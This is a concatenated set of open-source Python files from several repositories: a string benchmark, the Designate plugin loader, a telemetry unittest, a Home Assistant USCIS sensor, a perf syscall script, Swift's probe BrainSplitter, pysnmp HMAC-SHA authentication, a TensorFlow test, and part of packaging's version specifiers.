def upper_conversion_rare(STR):
s = STR("Where in the world is Carmen San Deigo?"*10)
s_upper = s.upper
for x in _RANGE_1000:
s_upper()
@bench('("where in the world is carmen san deigo?"*10).upper()',
"case conversion -- dense", 1000)
def upper_conversion_dense(STR):
s = STR("where in the world is carmen san deigo?"*10)
s_upper = s.upper
for x in _RANGE_1000:
s_upper()
# end of benchmarks
#################
class BenchTimer(timeit.Timer):
def best(self, repeat=1):
for i in range(1, 10):
number = 10**i
x = self.timeit(number)
if x > 0.02:
break
times = [x]
for i in range(1, repeat):
times.append(self.timeit(number))
return min(times) / number
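# Note (added comment): best() auto-calibrates the repeat count -- it tries
# number = 10, 100, 1000, ... until a single timeit(number) call takes longer
# than 0.02s, then returns the fastest per-iteration time over `repeat` runs.
# Illustrative (hypothetical) use:
#   BenchTimer("s.strip()", "s = ' x '").best(3)  -> seconds per strip() call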
def main():
(options, test_names) = parser.parse_args()
if options.bytes_only and options.unicode_only:
raise SystemExit("Only one of --8-bit and --unicode are allowed")
bench_functions = []
for (k,v) in globals().items():
if hasattr(v, "is_bench"):
if test_names:
for name in test_names:
if name in v.group:
break
else:
# Not selected, ignore
continue
if options.skip_re and hasattr(v, "uses_re"):
continue
bench_functions.append( (v.group, k, v) )
bench_functions.sort()
p("bytes\tunicode")
p("(in ms)\t(in ms)\t%\tcomment")
bytes_total = uni_total = 0.0
for title, group in itertools.groupby(bench_functions,
operator.itemgetter(0)):
# Flush buffer before each group
sys.stdout.flush()
p("="*10, title)
for (_, k, v) in group:
if hasattr(v, "is_bench"):
bytes_time = 0.0
bytes_time_s = " - "
if not options.unicode_only:
try:
bytes_time = BenchTimer("__main__.%s(__main__.BYTES)" % (k,),
"import __main__").best(REPEAT)
bytes_time_s = "%.2f" % (1000 * bytes_time)
bytes_total += bytes_time
except UnsupportedType:
bytes_time_s = "N/A"
uni_time = 0.0
uni_time_s = " - "
if not options.bytes_only:
try:
uni_time = BenchTimer("__main__.%s(__main__.UNICODE)" % (k,),
"import __main__").best(REPEAT)
uni_time_s = "%.2f" % (1000 * uni_time)
uni_total += uni_time
except UnsupportedType:
uni_time_s = "N/A"
try:
average = bytes_time/uni_time
except (TypeError, ZeroDivisionError):
average = 0.0
p("%s\t%s\t%.1f\t%s (*%d)" % (
bytes_time_s, uni_time_s, 100.*average,
v.comment, v.repeat_count))
if bytes_total == uni_total == 0.0:
p("That was zippy!")
else:
try:
ratio = bytes_total/uni_total
except ZeroDivisionError:
ratio = 0.0
p("%.2f\t%.2f\t%.1f\t%s" % (
1000*bytes_total, 1000*uni_total, 100.*ratio,
"TOTAL"))
if __name__ == "__main__":
main()
| apache-2.0 |
cneill/designate | designate/plugin.py | 8 | 4112 | # Copyright 2012 Bouvet ASA
#
# Author: Endre Karlson <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import six
from stevedore import driver
from stevedore import enabled
from stevedore import extension
from oslo_config import cfg
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
@six.add_metaclass(abc.ABCMeta)
class Plugin(object):
__plugin_ns__ = None
__plugin_name__ = None
__plugin_type__ = None
def __init__(self):
self.name = self.get_canonical_name()
LOG.debug("Loaded plugin %s" % self.name)
@classmethod
def get_canonical_name(cls):
"""
Return the plugin name
"""
type_ = cls.get_plugin_type()
name = cls.get_plugin_name()
return "%s:%s" % (type_, name)
@classmethod
def get_plugin_name(cls):
return cls.__plugin_name__
@classmethod
def get_plugin_type(cls):
return cls.__plugin_type__
@classmethod
def get_cfg_opts(cls):
"""Get any static configuration options
Returns an array of tuples in the form:
[(group1, [Option1, Option2]), (group2, [Option1, Option2])]
"""
return []
@classmethod
def get_extra_cfg_opts(cls):
"""Get any dynamically built configuration options
Returns an array of tuples in the form:
[(group1, [Option1, Option2]), (group2, [Option1, Option2])]
"""
return []
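    # Illustrative example (added comment, not part of the original module):
    # a concrete plugin would typically override get_cfg_opts() and return
    # oslo.config options in the documented shape, e.g.:
    #
    #     @classmethod
    #     def get_cfg_opts(cls):
    #         return [('backend:example',
    #                  [cfg.StrOpt('host', default='localhost'),
    #                   cfg.IntOpt('port', default=53)])]
    #
    # ('backend:example' and the option names are hypothetical.)
    # register_cfg_opts() below walks these tuples and registers each group
    # and its options on the global CONF object.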
@classmethod
def register_cfg_opts(cls, namespace):
mgr = extension.ExtensionManager(namespace)
for e in mgr:
for group, opts in e.plugin.get_cfg_opts():
if isinstance(group, six.string_types):
group = cfg.OptGroup(name=group)
CONF.register_group(group)
CONF.register_opts(opts, group=group)
@classmethod
def register_extra_cfg_opts(cls, namespace):
mgr = extension.ExtensionManager(namespace)
for e in mgr:
for group, opts in e.plugin.get_extra_cfg_opts():
if isinstance(group, six.string_types):
group = cfg.OptGroup(name=group)
CONF.register_group(group)
CONF.register_opts(opts, group=group)
class DriverPlugin(Plugin):
"""
A Driver plugin is a singleton, where only a single driver will loaded
at a time.
For example: Storage implementations (SQLAlchemy)
"""
@classmethod
def get_driver(cls, name):
"""Load a single driver"""
LOG.debug('Looking for driver %s in %s' % (name, cls.__plugin_ns__))
mgr = driver.DriverManager(cls.__plugin_ns__, name)
return mgr.driver
class ExtensionPlugin(Plugin):
"""
Extension plugins are loaded as a group, where multiple extensions will
be loaded and used at the same time.
For example: Designate Sink handlers
"""
@classmethod
def get_extensions(cls, enabled_extensions=None):
"""Load a series of extensions"""
LOG.debug('Looking for extensions in %s' % cls.__plugin_ns__)
def _check_func(ext):
if enabled_extensions is None:
# All extensions are enabled by default, if no specific list
# is specified
return True
return ext.plugin.get_plugin_name() in enabled_extensions
mgr = enabled.EnabledExtensionManager(
cls.__plugin_ns__, check_func=_check_func,
propagate_map_exceptions=True)
return [e.plugin for e in mgr]
| apache-2.0 |
yury-s/v8-inspector | Source/chrome/tools/telemetry/telemetry/results/csv_pivot_table_output_formatter_unittest.py | 20 | 3349 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import StringIO
import unittest
from telemetry import page as page_module
from telemetry.page import page_set
from telemetry.results import csv_pivot_table_output_formatter
from telemetry.results import page_test_results
from telemetry.value import scalar
def _MakePageSet():
ps = page_set.PageSet(file_path=os.path.dirname(__file__))
ps.AddUserStory(page_module.Page('http://www.foo.com/', ps, ps.base_dir))
ps.AddUserStory(page_module.Page('http://www.bar.com/', ps, ps.base_dir))
return ps
class CsvPivotTableOutputFormatterTest(unittest.TestCase):
# The line separator used by CSV formatter.
_LINE_SEPARATOR = '\r\n'
def setUp(self):
self._output = StringIO.StringIO()
self._page_set = _MakePageSet()
self._results = page_test_results.PageTestResults()
self._formatter = None
self.MakeFormatter()
def MakeFormatter(self, trace_tag=''):
self._formatter = (
csv_pivot_table_output_formatter.CsvPivotTableOutputFormatter(
self._output, trace_tag))
def SimulateBenchmarkRun(self, dict_of_values):
"""Simulate one run of a benchmark, using the supplied values.
Args:
dict_of_values: dictionary w/ Page instance as key, a list of Values
as value.
"""
for page, values in dict_of_values.iteritems():
self._results.WillRunPage(page)
for v in values:
v.page = page
self._results.AddValue(v)
self._results.DidRunPage(page)
def Format(self):
self._formatter.Format(self._results)
return self._output.getvalue()
def testSimple(self):
# Test a simple benchmark with only one value:
self.SimulateBenchmarkRun({
self._page_set[0]: [scalar.ScalarValue(None, 'foo', 'seconds', 3)]})
expected = self._LINE_SEPARATOR.join([
'page_set,page,name,value,units,run_index',
'page_set,http://www.foo.com/,foo,3,seconds,0',
''])
self.assertEqual(expected, self.Format())
def testMultiplePagesAndValues(self):
self.SimulateBenchmarkRun({
self._page_set[0]: [scalar.ScalarValue(None, 'foo', 'seconds', 4)],
self._page_set[1]: [scalar.ScalarValue(None, 'foo', 'seconds', 3.4),
scalar.ScalarValue(None, 'bar', 'km', 10),
scalar.ScalarValue(None, 'baz', 'count', 5)]})
# Parse CSV output into list of lists.
csv_string = self.Format()
lines = csv_string.split(self._LINE_SEPARATOR)
values = [s.split(',') for s in lines[1:-1]]
    self.assertEquals(len(values), 4)  # We expect 4 values in total.
self.assertEquals(len(set((v[1] for v in values))), 2) # 2 pages.
self.assertEquals(len(set((v[2] for v in values))), 3) # 3 value names.
def testTraceTag(self):
self.MakeFormatter(trace_tag='date,option')
self.SimulateBenchmarkRun({
self._page_set[0]: [scalar.ScalarValue(None, 'foo', 'seconds', 3),
scalar.ScalarValue(None, 'bar', 'tons', 5)]})
output = self.Format().split(self._LINE_SEPARATOR)
self.assertTrue(output[0].endswith(',trace_tag_0,trace_tag_1'))
for line in output[1:-1]:
self.assertTrue(line.endswith(',date,option'))
| bsd-3-clause |
Cinntax/home-assistant | homeassistant/components/uscis/sensor.py | 2 | 2273 | """Support for USCIS Case Status."""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.helpers import config_validation as cv
from homeassistant.const import CONF_FRIENDLY_NAME
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "USCIS"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_FRIENDLY_NAME, default=DEFAULT_NAME): cv.string,
vol.Required("case_id"): cv.string,
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the platform in HASS and Case Information."""
uscis = UscisSensor(config["case_id"], config[CONF_FRIENDLY_NAME])
uscis.update()
if uscis.valid_case_id:
add_entities([uscis])
else:
_LOGGER.error("Setup USCIS Sensor Fail" " check if your Case ID is Valid")
class UscisSensor(Entity):
"""USCIS Sensor will check case status on daily basis."""
MIN_TIME_BETWEEN_UPDATES = timedelta(hours=24)
CURRENT_STATUS = "current_status"
LAST_CASE_UPDATE = "last_update_date"
def __init__(self, case, name):
"""Initialize the sensor."""
self._state = None
self._case_id = case
self._attributes = None
self.valid_case_id = None
self._name = name
@property
def name(self):
"""Return the name."""
return self._name
@property
def state(self):
"""Return the state."""
return self._state
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._attributes
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Fetch data from the USCIS website and update state attributes."""
import uscisstatus
try:
status = uscisstatus.get_case_status(self._case_id)
self._attributes = {self.CURRENT_STATUS: status["status"]}
self._state = status["date"]
self.valid_case_id = True
except ValueError:
_LOGGER("Please Check that you have valid USCIS case id")
self.valid_case_id = False
| apache-2.0 |
fransklaver/linux | tools/perf/scripts/python/failed-syscalls-by-pid.py | 1996 | 2233 | # failed system call counts, by pid
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide failed system call totals, broken down by pid.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s syscall-counts-by-pid.py [comm|pid]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_error_totals()
def raw_syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, id, ret):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
if ret < 0:
try:
syscalls[common_comm][common_pid][id][ret] += 1
except TypeError:
syscalls[common_comm][common_pid][id][ret] = 1
def syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, ret):
raw_syscalls__sys_exit(**locals())
def print_error_totals():
if for_comm is not None:
print "\nsyscall errors for %s:\n\n" % (for_comm),
else:
print "\nsyscall errors:\n\n",
print "%-30s %10s\n" % ("comm [pid]", "count"),
print "%-30s %10s\n" % ("------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id in id_keys:
print " syscall: %-16s\n" % syscall_name(id),
ret_keys = syscalls[comm][pid][id].keys()
for ret, val in sorted(syscalls[comm][pid][id].iteritems(), key = lambda(k, v): (v, k), reverse = True):
print " err = %-20s %10d\n" % (strerror(ret), val),
| gpl-2.0 |
takeshineshiro/swift | test/probe/brain.py | 8 | 8163 | #!/usr/bin/python -u
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
import itertools
import uuid
from optparse import OptionParser
from urlparse import urlparse
import random
import six
from swift.common.manager import Manager
from swift.common import utils, ring
from swift.common.storage_policy import POLICIES
from swift.common.http import HTTP_NOT_FOUND
from swiftclient import client, get_auth, ClientException
from test.probe.common import ENABLED_POLICIES
TIMEOUT = 60
def meta_command(name, bases, attrs):
"""
Look for attrs with a truthy attribute __command__ and add them to an
attribute __commands__ on the type that maps names to decorated methods.
The decorated methods' doc strings also get mapped in __docs__.
Also adds a method run(command_name, *args, **kwargs) that will
execute the method mapped to the name in __commands__.
"""
commands = {}
docs = {}
for attr, value in attrs.items():
if getattr(value, '__command__', False):
commands[attr] = value
            # methods always have a __doc__ attribute, sometimes empty
docs[attr] = (getattr(value, '__doc__', None) or
'perform the %s command' % attr).strip()
attrs['__commands__'] = commands
attrs['__docs__'] = docs
def run(self, command, *args, **kwargs):
return self.__commands__[command](self, *args, **kwargs)
attrs.setdefault('run', run)
return type(name, bases, attrs)
def command(f):
f.__command__ = True
return f
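# Illustrative sketch (added comment, not part of the original module) of how
# meta_command and @command fit together; the class and method names below
# are hypothetical:
#
#     @six.add_metaclass(meta_command)
#     class Example(object):
#         @command
#         def ping(self):
#             """say hello"""
#
#     Example.__commands__  -> {'ping': <function ping>}
#     Example.__docs__      -> {'ping': 'say hello'}
#     instance.run('ping')  -> dispatches to instance.ping()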
@six.add_metaclass(meta_command)
class BrainSplitter(object):
def __init__(self, url, token, container_name='test', object_name='test',
server_type='container', policy=None):
self.url = url
self.token = token
self.account = utils.split_path(urlparse(url).path, 2, 2)[1]
self.container_name = container_name
self.object_name = object_name
server_list = ['%s-server' % server_type] if server_type else ['all']
self.servers = Manager(server_list)
policies = list(ENABLED_POLICIES)
random.shuffle(policies)
self.policies = itertools.cycle(policies)
o = object_name if server_type == 'object' else None
c = container_name if server_type in ('object', 'container') else None
if server_type in ('container', 'account'):
if policy:
raise TypeError('Metadata server brains do not '
'support specific storage policies')
self.policy = None
self.ring = ring.Ring(
'/etc/swift/%s.ring.gz' % server_type)
elif server_type == 'object':
if not policy:
raise TypeError('Object BrainSplitters need to '
'specify the storage policy')
self.policy = policy
policy.load_ring('/etc/swift')
self.ring = policy.object_ring
else:
            raise ValueError('Unknown server_type: %r' % server_type)
self.server_type = server_type
part, nodes = self.ring.get_nodes(self.account, c, o)
node_ids = [n['id'] for n in nodes]
if all(n_id in node_ids for n_id in (0, 1)):
self.primary_numbers = (1, 2)
self.handoff_numbers = (3, 4)
else:
self.primary_numbers = (3, 4)
self.handoff_numbers = (1, 2)
@command
def start_primary_half(self):
"""
start servers 1 & 2
"""
tuple(self.servers.start(number=n) for n in self.primary_numbers)
@command
def stop_primary_half(self):
"""
stop servers 1 & 2
"""
tuple(self.servers.stop(number=n) for n in self.primary_numbers)
@command
def start_handoff_half(self):
"""
start servers 3 & 4
"""
tuple(self.servers.start(number=n) for n in self.handoff_numbers)
@command
def stop_handoff_half(self):
"""
stop servers 3 & 4
"""
tuple(self.servers.stop(number=n) for n in self.handoff_numbers)
@command
def put_container(self, policy_index=None):
"""
put container with next storage policy
"""
policy = next(self.policies)
if policy_index is not None:
policy = POLICIES.get_by_index(int(policy_index))
if not policy:
                raise ValueError('Unknown policy with index %s' % policy_index)
headers = {'X-Storage-Policy': policy.name}
client.put_container(self.url, self.token, self.container_name,
headers=headers)
@command
def delete_container(self):
"""
delete container
"""
client.delete_container(self.url, self.token, self.container_name)
@command
def put_object(self, headers=None):
"""
issue put for zero byte test object
"""
client.put_object(self.url, self.token, self.container_name,
self.object_name, headers=headers)
@command
def delete_object(self):
"""
issue delete for test object
"""
try:
client.delete_object(self.url, self.token, self.container_name,
self.object_name)
except ClientException as err:
if err.http_status != HTTP_NOT_FOUND:
raise
parser = OptionParser('%prog [options] '
'<command>[:<args>[,<args>...]] [<command>...]')
parser.usage += '\n\nCommands:\n\t' + \
'\n\t'.join("%s - %s" % (name, doc) for name, doc in
BrainSplitter.__docs__.items())
parser.add_option('-c', '--container', default='container-%s' % uuid.uuid4(),
help='set container name')
parser.add_option('-o', '--object', default='object-%s' % uuid.uuid4(),
help='set object name')
parser.add_option('-s', '--server_type', default='container',
help='set server type')
parser.add_option('-P', '--policy_name', default=None,
help='set policy')
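# Illustrative invocation (added comment; container name is hypothetical):
#
#   python brain.py -s container -c mycontainer \
#       stop_primary_half put_container start_primary_half
#
# Each positional argument is a command from BrainSplitter.__commands__ and
# may carry arguments after a colon, e.g. 'put_container:0' to force a
# specific storage policy index.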
def main():
options, commands = parser.parse_args()
if not commands:
parser.print_help()
return 'ERROR: must specify at least one command'
for cmd_args in commands:
cmd = cmd_args.split(':', 1)[0]
if cmd not in BrainSplitter.__commands__:
parser.print_help()
return 'ERROR: unknown command %s' % cmd
url, token = get_auth('http://127.0.0.1:8080/auth/v1.0',
'test:tester', 'testing')
if options.server_type == 'object' and not options.policy_name:
options.policy_name = POLICIES.default.name
if options.policy_name:
options.server_type = 'object'
policy = POLICIES.get_by_name(options.policy_name)
if not policy:
return 'ERROR: unknown policy %r' % options.policy_name
else:
policy = None
brain = BrainSplitter(url, token, options.container, options.object,
options.server_type, policy=policy)
for cmd_args in commands:
parts = cmd_args.split(':', 1)
command = parts[0]
if len(parts) > 1:
args = utils.list_from_csv(parts[1])
else:
args = ()
try:
brain.run(command, *args)
except ClientException as e:
print('**WARNING**: %s raised %s' % (command, e))
print('STATUS'.join(['*' * 25] * 2))
brain.servers.status()
sys.exit()
if __name__ == "__main__":
sys.exit(main())
| apache-2.0 |
seblefevre/testerman | core/snmp/pysnmp/proto/secmod/rfc3414/auth/hmacsha.py | 2 | 3023 | try:
from hashlib import sha1
except ImportError:
import sha
sha1 = sha.new
import string
from pysnmp.proto.secmod.rfc3414.auth import base
from pysnmp.proto import error
_twelveZeros = '\x00'*12
_fortyFourZeros = '\x00'*44
# 7.2.4
class HmacSha(base.AbstractAuthenticationService):
serviceID = (1, 3, 6, 1, 6, 3, 10, 1, 1, 3) # usmHMACSHAAuthProtocol
__ipad = [0x36]*64
__opad = [0x5C]*64
# 7.3.1
def authenticateOutgoingMsg(self, authKey, wholeMsg):
# 7.3.1.1
# Here we expect calling secmod to indicate where the digest
# should be in the substrate. Also, it pre-sets digest placeholder
# so we hash wholeMsg out of the box.
# Yes, that's ugly but that's rfc...
l = string.find(wholeMsg, _twelveZeros)
if l == -1:
            raise error.ProtocolError("Can't locate digest placeholder")
wholeHead = wholeMsg[:l]
wholeTail = wholeMsg[l+12:]
# 7.3.1.2a
extendedAuthKey = map(ord, str(authKey) + _fortyFourZeros)
# 7.3.1.2b -- noop
# 7.3.1.2c
k1 = string.join(
map(lambda x,y: chr(x^y), extendedAuthKey, self.__ipad), ''
)
# 7.3.1.2d -- noop
# 7.3.1.2e
k2 = string.join(
map(lambda x,y: chr(x^y), extendedAuthKey, self.__opad), ''
)
# 7.3.1.3
d1 = sha1(k1+wholeMsg).digest()
# 7.3.1.4
d2 = sha1(k2+d1).digest()
mac = d2[:12]
# 7.3.1.5 & 6
return '%s%s%s' % (wholeHead, mac, wholeTail)
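    # Illustrative note (added comment, not part of the original module):
    # authKey is the localized HMAC-SHA-96 authentication key and wholeMsg
    # must already carry the 12-zero-byte placeholder where the digest will
    # be written, e.g. (names are hypothetical):
    #
    #   authenticated_msg = HmacSha().authenticateOutgoingMsg(
    #       localized_auth_key, msg_with_zeroed_auth_params)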
# 7.3.2
def authenticateIncomingMsg(self, authKey, authParameters, wholeMsg):
# 7.3.2.1 & 2
if len(authParameters) != 12:
raise error.StatusInformation(
errorIndication='authenticationError'
)
# 7.3.2.3
l = string.find(wholeMsg, str(authParameters))
if l == -1:
            raise error.ProtocolError("Can't locate digest in wholeMsg")
wholeHead = wholeMsg[:l]
wholeTail = wholeMsg[l+12:]
authenticatedWholeMsg = '%s%s%s' % (
wholeHead, _twelveZeros, wholeTail
)
# 7.3.2.4a
extendedAuthKey = map(ord, str(authKey) + _fortyFourZeros)
# 7.3.2.4b --> noop
# 7.3.2.4c
k1 = string.join(
map(lambda x,y: chr(x^y), extendedAuthKey, self.__ipad), ''
)
# 7.3.2.4d --> noop
# 7.3.2.4e
k2 = string.join(
map(lambda x,y: chr(x^y), extendedAuthKey, self.__opad), ''
)
# 7.3.2.5a
d1 = sha1(k1+authenticatedWholeMsg).digest()
# 7.3.2.5b
d2 = sha1(k2+d1).digest()
# 7.3.2.5c
mac = d2[:12]
# 7.3.2.6
if mac != authParameters:
raise error.StatusInformation(
errorIndication='authenticationFailure'
)
return authenticatedWholeMsg
| gpl-2.0 |
asimshankar/tensorflow | tensorflow/python/kernel_tests/zero_division_test.py | 6 | 2466 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for integer division by zero."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import test_util
from tensorflow.python.platform import test
class ZeroDivisionTest(test.TestCase):
@test_util.run_deprecated_v1
def testZeros(self):
with test_util.use_gpu():
for dtype in dtypes.uint8, dtypes.int16, dtypes.int32, dtypes.int64:
zero = constant_op.constant(0, dtype=dtype)
one = constant_op.constant(1, dtype=dtype)
bads = [one // zero]
if dtype in (dtypes.int32, dtypes.int64):
bads.append(one % zero)
for bad in bads:
try:
result = self.evaluate(bad)
except errors_impl.OpError as e:
# Ideally, we'd get a nice exception. In theory, this should only
# happen on CPU, but 32 bit integer GPU division is actually on
# CPU due to a placer bug.
# TODO(irving): Make stricter once the placer bug is fixed.
self.assertIn('Integer division by zero', str(e))
else:
# On the GPU, integer division by zero produces all bits set.
# But apparently on some GPUs "all bits set" for 64 bit division
# means 32 bits set, so we allow 0xffffffff as well. This isn't
# very portable, so we may need to expand this list if other GPUs
# do different things.
self.assertTrue(test.is_gpu_available())
self.assertIn(result, (-1, 0xff, 0xffffffff))
if __name__ == '__main__':
test.main()
| apache-2.0 |
astaninger/speakout | venv/lib/python3.6/site-packages/pkg_resources/_vendor/packaging/specifiers.py | 1107 | 28025 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import abc
import functools
import itertools
import re
from ._compat import string_types, with_metaclass
from .version import Version, LegacyVersion, parse
class InvalidSpecifier(ValueError):
"""
An invalid specifier was found, users should refer to PEP 440.
"""
class BaseSpecifier(with_metaclass(abc.ABCMeta, object)):
@abc.abstractmethod
def __str__(self):
"""
Returns the str representation of this Specifier like object. This
should be representative of the Specifier itself.
"""
@abc.abstractmethod
def __hash__(self):
"""
Returns a hash value for this Specifier like object.
"""
@abc.abstractmethod
def __eq__(self, other):
"""
Returns a boolean representing whether or not the two Specifier like
objects are equal.
"""
@abc.abstractmethod
def __ne__(self, other):
"""
Returns a boolean representing whether or not the two Specifier like
objects are not equal.
"""
@abc.abstractproperty
def prereleases(self):
"""
Returns whether or not pre-releases as a whole are allowed by this
specifier.
"""
@prereleases.setter
def prereleases(self, value):
"""
Sets whether or not pre-releases as a whole are allowed by this
specifier.
"""
@abc.abstractmethod
def contains(self, item, prereleases=None):
"""
Determines if the given item is contained within this specifier.
"""
@abc.abstractmethod
def filter(self, iterable, prereleases=None):
"""
Takes an iterable of items and filters them so that only items which
are contained within this specifier are allowed in it.
"""
class _IndividualSpecifier(BaseSpecifier):
_operators = {}
def __init__(self, spec="", prereleases=None):
match = self._regex.search(spec)
if not match:
raise InvalidSpecifier("Invalid specifier: '{0}'".format(spec))
self._spec = (
match.group("operator").strip(),
match.group("version").strip(),
)
# Store whether or not this Specifier should accept prereleases
self._prereleases = prereleases
def __repr__(self):
pre = (
", prereleases={0!r}".format(self.prereleases)
if self._prereleases is not None
else ""
)
return "<{0}({1!r}{2})>".format(
self.__class__.__name__,
str(self),
pre,
)
def __str__(self):
return "{0}{1}".format(*self._spec)
def __hash__(self):
return hash(self._spec)
def __eq__(self, other):
if isinstance(other, string_types):
try:
other = self.__class__(other)
except InvalidSpecifier:
return NotImplemented
elif not isinstance(other, self.__class__):
return NotImplemented
return self._spec == other._spec
def __ne__(self, other):
if isinstance(other, string_types):
try:
other = self.__class__(other)
except InvalidSpecifier:
return NotImplemented
elif not isinstance(other, self.__class__):
return NotImplemented
return self._spec != other._spec
def _get_operator(self, op):
return getattr(self, "_compare_{0}".format(self._operators[op]))
def _coerce_version(self, version):
if not isinstance(version, (LegacyVersion, Version)):
version = parse(version)
return version
@property
def operator(self):
return self._spec[0]
@property
def version(self):
return self._spec[1]
@property
def prereleases(self):
return self._prereleases
@prereleases.setter
def prereleases(self, value):
self._prereleases = value
def __contains__(self, item):
return self.contains(item)
def contains(self, item, prereleases=None):
# Determine if prereleases are to be allowed or not.
if prereleases is None:
prereleases = self.prereleases
# Normalize item to a Version or LegacyVersion, this allows us to have
# a shortcut for ``"2.0" in Specifier(">=2")
item = self._coerce_version(item)
# Determine if we should be supporting prereleases in this specifier
# or not, if we do not support prereleases than we can short circuit
# logic if this version is a prereleases.
if item.is_prerelease and not prereleases:
return False
# Actually do the comparison to determine if this item is contained
# within this Specifier or not.
return self._get_operator(self.operator)(item, self.version)
def filter(self, iterable, prereleases=None):
yielded = False
found_prereleases = []
kw = {"prereleases": prereleases if prereleases is not None else True}
# Attempt to iterate over all the values in the iterable and if any of
# them match, yield them.
for version in iterable:
parsed_version = self._coerce_version(version)
if self.contains(parsed_version, **kw):
# If our version is a prerelease, and we were not set to allow
                # prereleases, then we'll store it for later in case nothing
# else matches this specifier.
if (parsed_version.is_prerelease and not
(prereleases or self.prereleases)):
found_prereleases.append(version)
# Either this is not a prerelease, or we should have been
                # accepting prereleases from the beginning.
else:
yielded = True
yield version
# Now that we've iterated over everything, determine if we've yielded
# any values, and if we have not and we have any prereleases stored up
# then we will go ahead and yield the prereleases.
if not yielded and found_prereleases:
for version in found_prereleases:
yield version
class LegacySpecifier(_IndividualSpecifier):
_regex_str = (
r"""
(?P<operator>(==|!=|<=|>=|<|>))
\s*
(?P<version>
[^,;\s)]* # Since this is a "legacy" specifier, and the version
# string can be just about anything, we match everything
# except for whitespace, a semi-colon for marker support,
# a closing paren since versions can be enclosed in
# them, and a comma since it's a version separator.
)
"""
)
_regex = re.compile(
r"^\s*" + _regex_str + r"\s*$", re.VERBOSE | re.IGNORECASE)
_operators = {
"==": "equal",
"!=": "not_equal",
"<=": "less_than_equal",
">=": "greater_than_equal",
"<": "less_than",
">": "greater_than",
}
def _coerce_version(self, version):
if not isinstance(version, LegacyVersion):
version = LegacyVersion(str(version))
return version
def _compare_equal(self, prospective, spec):
return prospective == self._coerce_version(spec)
def _compare_not_equal(self, prospective, spec):
return prospective != self._coerce_version(spec)
def _compare_less_than_equal(self, prospective, spec):
return prospective <= self._coerce_version(spec)
def _compare_greater_than_equal(self, prospective, spec):
return prospective >= self._coerce_version(spec)
def _compare_less_than(self, prospective, spec):
return prospective < self._coerce_version(spec)
def _compare_greater_than(self, prospective, spec):
return prospective > self._coerce_version(spec)
def _require_version_compare(fn):
@functools.wraps(fn)
def wrapped(self, prospective, spec):
if not isinstance(prospective, Version):
return False
return fn(self, prospective, spec)
return wrapped
class Specifier(_IndividualSpecifier):
_regex_str = (
r"""
(?P<operator>(~=|==|!=|<=|>=|<|>|===))
(?P<version>
(?:
# The identity operators allow for an escape hatch that will
# do an exact string match of the version you wish to install.
# This will not be parsed by PEP 440 and we cannot determine
# any semantic meaning from it. This operator is discouraged
# but included entirely as an escape hatch.
(?<====) # Only match for the identity operator
\s*
[^\s]* # We just match everything, except for whitespace
# since we are only testing for strict identity.
)
|
(?:
# The (non)equality operators allow for wild card and local
# versions to be specified so we have to define these two
# operators separately to enable that.
(?<===|!=) # Only match for equals and not equals
\s*
v?
(?:[0-9]+!)? # epoch
[0-9]+(?:\.[0-9]+)* # release
(?: # pre release
[-_\.]?
(a|b|c|rc|alpha|beta|pre|preview)
[-_\.]?
[0-9]*
)?
(?: # post release
